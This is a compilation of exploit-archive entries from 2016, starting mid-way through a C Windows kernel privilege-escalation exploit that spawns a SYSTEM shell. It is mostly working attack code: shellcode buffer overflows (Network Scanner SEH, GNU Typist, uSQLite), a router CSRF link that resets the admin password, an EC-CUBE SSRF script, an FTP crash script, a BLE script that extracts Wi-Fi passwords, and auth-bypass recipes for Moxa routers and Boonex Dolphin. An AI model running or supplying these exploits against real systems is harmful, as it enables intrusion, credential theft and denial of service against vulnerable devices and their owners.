(PVOID) InputBuffer, sizeof(InputBuffer),
(PVOID) (HalDispatchTableKrnlSpcAddr), 0,
&dwReturnSize, NULL
) == 0)
{
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms679360(v=vs.85).aspx
errorCode = GetLastError();
// https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx
// in case of ERROR_INSUFFICIENT_BUFFER
if(errorCode == 122)
{
// target is patched
printf(" [!] Target patched\n");
printf(" [*] Possible security patches\n");
for(i = 0; i < securityPatchesCount; i++)
printf(" [*] %s\n", securityPatchesPtr[i]);
return -1;
}
// in case of any other error message
else
{
// print the error code
printf(" [-] Failed (error code: %d)\n", errorCode);
return -1;
}
}
else
printf(" [+] Done\n");
// elevate privileges of the current process
printf(" [*] Elevating privileges to SYSTEM\n");
ULONG outInterval = 0;
// https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProfile%2FNtQueryIntervalProfile.html
NtQueryIntervalProfile(2, &outInterval);
printf(" [+] Done\n");
// spawn shell (with elevated privileges)
printf(" [*] Spawning shell\n");
// spawn SYSTEM shell within the current shell (remote shell friendly)
system ("c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32");
// exit
printf("\n[*] Exiting SYSTEM shell\n");
return 1;
}
// EoF
# Exploit Title: Orange Inventel LiveBox CSRF
# Google Dork: N/A
# Date: 10-24-2016
# Exploit Author: BlackMamba TEAM (BM1)
# Vendor Homepage: N/A
# Version: Inventel - v5.08.3-sp
# Tested on: Windows 7 64bit
# CVE : N/A
# Category: Hardware
1. Description
This Router is vulnerable to Cross Site Request Forgery , a hacker can send a well crafted link or well crafted web page(see the POC) to the administrator.
and thus change the admin password (without the need to know the old one).
this affects the other settings too (SSID name , SSID Security ,enabling disabling the firewall.......).
2. Proof of Concept
this link once clicked the admin password is changed to "blackmamba" (withouth ")
<a href="http://192.168.1.1/configok.cgi?sysPassword=blackmamba">Cats !!!</a>
this link once clicked sets the SSID to "BLACKMAMBA" with the security to NONE (open wirless network)
<a href="http://192.168.1.1/advancedboot.cgi?associateTime=10&wifiEssid=BLACKMAMBA&wifiWep=0">Dogs :D !!!</a>
3. Mitigation
this is kinda obvious but DO NOT click on links you can't verify there origine specialy when connected to the Router's interface.
------------------------------------------------------------------------------------------------------------------------------------------------------------
From the Moroccan team : BLACK MAMBA (by BM1)
# Exploit Title: EC-CUBE 2.12.6 Server-Side Request Forgery
# Date: 22/10/16
# Exploit Author: Wad Deek
# Vendor Homepage: http://en.ec-cube.net/
# Software Link: http://en.ec-cube.net/download/
# Version: 2.12.6en-p1
# Tested on: Xampp on Windows7
# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools
##
##
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
require('mechanize')
agent = Mechanize.new()
agent.read_timeout = 3
agent.open_timeout = 3
agent.keep_alive = false
agent.redirect_ok = true
agent.agent.http.verify_mode = OpenSSL::SSL::VERIFY_NONE
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#===========================
urls = <<URLS
http://localhost/eccube/
URLS
urls.split("\n").each() do |url|
#===========================
#{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
def get(agent, target)
begin
response = agent.get(target)
code = response.code()
body = response.body()
rescue
else
return code, body
end
end
#{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
target = url+"test/api_test.php"
code, body = get(agent, target)
if(code == "200" && body.include?("EC-CUBE API TEST") == true)
begin
response = agent.post(
target,
{
"AccessKeyId" => 4111111111111111,
"arg_key0" => 1,
"arg_key1" => 1,
"arg_key2" => 1,
"arg_key3" => 1,
"arg_key4" => 1,
"arg_key5" => 1,
"arg_key6" => 1,
"arg_key7" => 1,
"arg_key8" => 1,
"arg_key9" => 1,
"arg_val0" => 1,
"arg_val1" => 1,
"arg_val2" => 1,
"arg_val3" => 1,
"arg_val4" => 1,
"arg_val5" => 1,
"arg_val6" => 1,
"arg_val7" => 1,
"arg_val8" => 1,
"arg_val9" => 1,
#????????????????????????????????????????????????????????????
"EndPoint" => "http://www.monip.org/index.php"+"?.jpg",
#????????????????????????????????????????????????????????????
"mode=" => "",
"Operation" => 1,
"SecretKey" => 1,
"Service" => 1,
"Signature" => 1,
"Timestamp" => 1,
"type" => "index.php"
})
body = response.body()
rescue
else
ip = response.body().scan(/IP : (.+?)</).join()
puts("[+] "+target+" >>>> monip.org >>>> "+ip)
end
end
#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
#===========================
end
#===========================
Title: Industrial Secure Routers - Insecure Configuration Management
Type: Local/Remote
Author: Nassim Asrir
Author Company: HenceForth
Impact: Insecure Configuration Management
Risk: (4/5)
Release Date: 22.10.2016
Summary:
Moxa's EDR series industrial Gigabit-performance secure routers are designed to protect the control networks of critical facilities while maintaining fast data transmissions.
The EDR series security routers provides integrated cyber security solutions that combine industrial firewall, VPN, router, and L2 switching* functions into one product specifically
designed for automation networks,which protects the integrity of remote access and critical devices.
description:
Using this Vulnerability we can change the Admin configuration without knowing Password & Username
Because the form for change the configurations is Insecure.
Vendor:
http://www.moxa.com/product/Industrial_Secure_Routers.htm
Affected Version:
EDR-810, EDR-G902 and EDR-G903
Tested On:
Linux // Dist (Bugtraq 2)
Vendor Status:
I told them and i wait for the answer.
PoC:
- when you navigate the server automatically you redirect to the login page (http://site/login.asp).
- so Just add in the end of URL (admin.htm) then you get the Form to change the Admin configurations.
Credits
Vulnerability discovered by Nassim Asrir - <wassline@gmail.com>
#!/usr/bin/python
# -*- coding: utf-8 -*-
### Network Scanner Version 4.0.0.0 - SEH Overflow Exploit by n30m1nd ###
# Date: 2016-10-21
# Exploit Author: n30m1nd
# Exploit Title: Network Scanner Version 4.0.0.0 SEH Based Exploit
# Vendor Homepage: http://www.mitec.cz/
# Software Link: https://www.exploit-db.com/apps/8a419b10772d811ce5eea44cb88ae55b-NetScan.zip
# Version: 4.0.0.0
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# PoC by: INSECT.B - http://binsect00.tistory.com
# https://www.exploit-db.com/exploits/39447/
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Run this python script. It will generate an "exploit.txt" file.
# * Copy the contents and, in the program, go to the "TOOLS" tab then click on "Detect IP from hostname" and paste the contents
# * MessageBoxA is called on an infinite loop since the exception handler is triggered all the time
# Exploit code
# ============
import struct
# MessageBoxA in NetScan.exe => 004042F1
mbox = (
"\x25\x41\x41\x41"
"\x41\x25\x32\x32"
"\x32\x32\x50\x68"
"\x70\x77\x6E\x64"
"\x54\x5F\x50\x57"
"\x57\x50\x35\x8E"
"\x60\x60\x55\x35"
"\x7F\x22\x20\x55"
"\x50\xC3"
)
# JUMP BACK to our shellcode!
nseh = (
# xor al,51h; Sets the ZF = 0 (We have to be very unlucky for eax to end in 51h)
"\x34\x51"
# jne -32h; Jump if ZF = 0
"\x75\xCC"
)
# pop pop ret => 00402E67
sehh = struct.pack("<L", 0x00402e67)
payl = "A" * (76-48)
payl+= mbox
payl+= "A"*(48-len(mbox))
payl+= nseh + sehh
with open("exploit.txt","wb") as f:
f.write(payl[:-1])
print payl
"""
NOTE:
The original author of this PoC stated that it was not possible to be
exploited since all addresses inside the binary contain the null byte.
As you can see in this exploit, the null byte is added by default at
the end because strings are null terminated when read from an input
box. This is why we write the payload minus 1 byte, payl[:-1], because
we don't need to write the last null byte for the "pop pop ret" jump
in the "sehh" variable.
"""
# Exploit Title : Boonex Dolphin all versoin <= 7.3 Authentication Bypass
# Exploit Author : Saadat Ullah saadi_linux[@]rocketmail.com
# Software Link : https://www.boonex.com
# Author HomePage : http://security-geeks.blogspot.com
Proof of Concept
File: admin.inc.php
Line: 187
Code: (strcmp($aProfile['Password'], $passwd) != 0)
$passwd is equal to Cookie parameter memberpassword
Bug:
According to PHP documentation strcmp will compare strings, but what if we provide an array???
So, simple bypass is to put two cookies in browser
memberID=1
memberPassword[]=blah --->array
This will allow the attacker to bypass the authentication and can also enter in admin panel.
#Independent Pakistani Security Researcher
from ftplib import FTP
print '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: smallftp_mkd_command_DoS_Exploit
# Date: 2016.10.26
# Exploit Author: Greg Priest
# Version: smallftpd 1.0.3
# Tested on: Windows XP, Windows 7 x64
'''
ftp_ip = raw_input("FTP server IP:")
user = raw_input("username:")
password = raw_input("password:")
killercode = 'CRASH' * 100
ftp = FTP(ftp_ip)
ftp.login(user, password)
print ftp.login
print "CRSAH CODE SENT!"
FTP.mkd(ftp, killercode)
#!/usr/bin/python
# Exploit Title: Komfy Switch with Camera Wifi Password Disclosure via Bluetooth BLE
# Date: Oct 13, 2016
# Exploit Author: Jason Doyle @_jasondoyle
# Vendor Homepage: http://us.dlink.com/products/connected-home/komfy-switch-with-camera/
# HW Model: DKZ-201S/W
# SW Version: 1.0
# Tested on: Ubuntu 16.04 LTS / Python 2.7
# Disclosure Timeline: 10/11/16 Reported vulnerability to D-Link
# 10/11/16 D-Link responded - The Komfy switch will be discontinued 12/30/16. No fix planned.
# Vulnerability Summary
#It is possible for an unauthenticated, remote attacker to retrieve the Komfy device's associated wifi ssid and password over bluetooth (4.0/BLE).
# Vulnerability Details
#https://github.com/jasondoyle/Komfy-Switch-Wifi-Password-Disclosure
# Author: Jason Doyle @_jasondoyle
# Komfy Switch with Camera wifi password disclosure exploit script
import re, base64
from bluepy.btle import Scanner
from gattlib import GATTRequester
#lookup table to unscramble
base64Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" # '=' used for padding
komfy64Alphabet = "qazwersdfxcvbgtyhnmjklpoiu5647382910+/POIKLMJUYTGHNBVFREWSDCXZAQ$" # '$' used for padding
scanner = Scanner()
devices = scanner.scan(5.0)
bAddr = ""
for dev in devices:
if "6c:72:20" in dev.addr and dev.getValueText(1) and dev.getValueText(7) and dev.getValueText(9):
bAddr = dev.addr
print "[+] Komfy switch found: %s (%s), RSSI=%d dB" % (dev.addr, dev.addrType, dev.rssi)
if not bAddr:
print "No Komfy switches found"
sys.exit(1)
req = GATTRequester(bAddr.encode('ascii','ignore'), False, 'hci0')
req.connect(True, 'public', 'none', 0, 78)
#request SSID
wifiSsid = req.read_by_uuid("0xb006")[0]
reg = re.search(r"(:\s\"(.*)\")", wifiSsid)
wifiSsid = reg.groups()[1].replace("\\","")
#request komfy encoded wifi password
wifiPassKomfy64 = req.read_by_uuid("0xb007")[0]
reg = re.search(r"(:\s\"(.*)\")", wifiPassKomfy64)
wifiPassKomfy64 = reg.groups()[1].replace("\\","")
#convert password to real base64
wifiPassBase64 = ""
for char in wifiPassKomfy64:
i = komfy64Alphabet.index(char)
wifiPassBase64 += base64Alphabet[i]
wifiPass = base64.b64decode(wifiPassBase64)
print "[+] Wifi password found for Komfy Switch [%s] SSID: %s Password: %s" % (bAddr, wifiSsid, wifiPass)
# Exploit developed using Exploit Pack v6.5
# Exploit Author: Juan Sacco - http://www.exploitpack.com -
# jsacco@exploitpack.com
# Program affected: GNU Typist
# Affected value: ARG0
# Version: 2.9.5-2
#
# Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org
# Program description: Simple ncurses touch typing tutor
# Displays exercise lines, measures your typing speed and
# accuracy, and displays the results
# Kali Linux 2.0 package: pool/main/g/gtypist/gtypist_2.9.5-2_i386.deb
# MD5sum: 7ca59c5c0c494e41735b7be676401357
# Website: http://www.gnu.org/software/gtypist/
# gdb$ run `python -c 'print "A"*4098'`
# 0xb7e95def in __strcpy_chk () from /lib/i386-linux-gnu/libc.so.6
# 0x0804bf30 in ?? ()
# 0xb7dbb5f7 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
# 0x0804c393 in ?? ()
import os, subprocess
def run():
try:
print "# GNU GTypist - Local Buffer Overflow by Juan Sacco"
print "# This Exploit has been developed using Exploit Pack -
http://exploitpack.com"
# NOPSLED + SHELLCODE + EIP
buffersize = 4098
nopsled = "\x90"*30
shellcode =
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x08\xec\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
subprocess.call(["gtypist ",' ', buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Sorry, GNU GTypist - Not found!"
else:
print "Error executing exploit"
raise
def howtousage():
print "Snap! Something went wrong"
sys.exit(-1)
if __name__ == '__main__':
try:
print "Exploit GNU GTypist - Local Overflow Exploit"
print "Author: Juan Sacco - Exploit Pack"
except IndexError:
howtousage()
run()
#!/usr/bin/python
# Exploit Title: Remote buffer overflow vulnerability in uSQLite 1.0.0 PoC
# Date: 27/10/1016
# Exploit Author: Peter Baris
# Software Link: https://sourceforge.net/projects/usqlite/?source=directory
# Version: 1.0.0
# Tested on: windows 7 and XP SP3
# Longer strings will cause heap based overflow
# usage: python usqlite.py <host address>
# Output in the debugger
# EAX 0000038C
# ECX 00B0DA10
# EDX 0000038C
# EBX 41414141
# ESP 0028F8D0 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
# EBP 41414141
# ESI 41414141
# EDI 41414141
# EIP 42424242 <-- EIP is under control, but depending on the OS version, you might have issues finding a jump spot without DEP and ASLR.
###############################################################################################################################################
import socket
import sys
if len(sys.argv)<=1:
print("Usage: python usqlite.py hostname")
sys.exit()
hostname=sys.argv[1]
port = 3002
buffer = "A"*259+"B"*4+"C"*360
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((hostname,port))
sock.send(buffer +'\r\n')
sock.recv(1024)
sock.close()
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/HP-TOUCHSMART-CALENDAR-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec
Vendor:
==========
www.hp.com
Product:
===========================================
Hewlett Packard TouchSmart Calendar Service
File version : 4.1.4245
HP TouchSmart Calendar is a shared calendar where you can manage your family’s schedule. You can also view scheduled events for today
and tomorrow, e-mail calendar events with Google mail, and print your schedule.
Vulnerability Type:
=====================
Privilege Escalation
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
HP Calendar Service uses weak insecure permissions settings on its files/directory as the “Everyone” group has full access on it.
Allowing low privileged users to execute arbitrary code in the security context of ANY other users with elevated privileges
on the affected system.
Any user (even guest) will be able to replace, modify or change the file. This would allow an attacker the ability to inject code
or replace the "HPTouchSmartSyncCalReminderApp.exe" executable and have it run in the context of the system.
Proof...
c:\Windows\System32>sc query "HP Support Assistant Service"
SERVICE_NAME: HP Support Assistant Service
TYPE : 10 WIN32_OWN_PROCESS
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
c:\>cacls "C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service"
C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service Everyone:(OI)(CI)F
NT AUTHORITY\SYSTEM:(OI)(CI)F
Disclosure Timeline:
======================================
Vendor Notification: October 14, 2016
Vendor response: Product past warranty support
October 26, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
================
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx